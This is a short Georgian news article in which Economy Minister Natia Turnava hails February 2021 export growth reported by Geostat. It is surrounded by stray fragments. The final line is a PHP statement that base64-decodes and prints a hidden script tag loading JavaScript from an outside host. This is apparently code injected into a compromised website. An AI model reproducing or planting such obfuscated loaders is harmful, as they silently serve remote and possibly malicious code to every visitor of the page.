celsiusi
ავერსი შნაიდერი
ნათია თურნავამ „საქსტატის“ მიერ გამოქვეყნებული მონაცემები შეაფასებისა,  რომლის თანახმად, მთლიანი ექსპორტი 2.9%-ით, ხოლო ადგილობრივი ექსპორტი რეექსპორტის გარეშე, რეკორდული ტემპით - 23.3%-ით გაიზარდა.
 
„თებერვლის თვეში ადგილობრივი ექსპორტის რეკორდული ზრდა არის პირველი ნიშანი, რომ ჩვენ, ვაქცინაციის და კოვიდთან ბრძოლის ფონზე ვიწყებთ ეკონომიკის გაჯანსაღებას და 2021 წელი ნამდვილად იქნება ეკონომიკის გამოცოცხლების წელი“, - განაცხადა ეკონომიკისა და მდგრადი განვითარების მინისტრმა.
 
მისივე ინფორმაციით, თებერვალში ადგილობრივი ექსპორტის ორნიშნა ზრდა   ძირითადად ორი კომპონენტს - სოფლის მეურნეობის პროდუქციას და სამთო-გადამამუშავებელი დარგის პროდუქციას უკავშირდება.
 
„იწყება ეკონომიკის გამოცოცხლება და  როგორც ჩვენი პარტნიორები გვეუბნებიან, საქართველო იქნება ლიდერი რეგიონში გაჯანსაღების ტემპის მიხედვით“ - აღნიშნა ეკონომიკის მინისტრმა.
 
ცნობისთვის,  „საქსტატის“ მონაცემებით, 2021 წლის თებერვალში, წინა წლის შესაბამის პერიოდთან შედარებით, ექსპორტი 2.9 პროცენტით გაიზარდა და  მისმა მოცულობამ 270.3 მლნ. აშშ. დოლარი შეადგინა.
 
 
1500
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");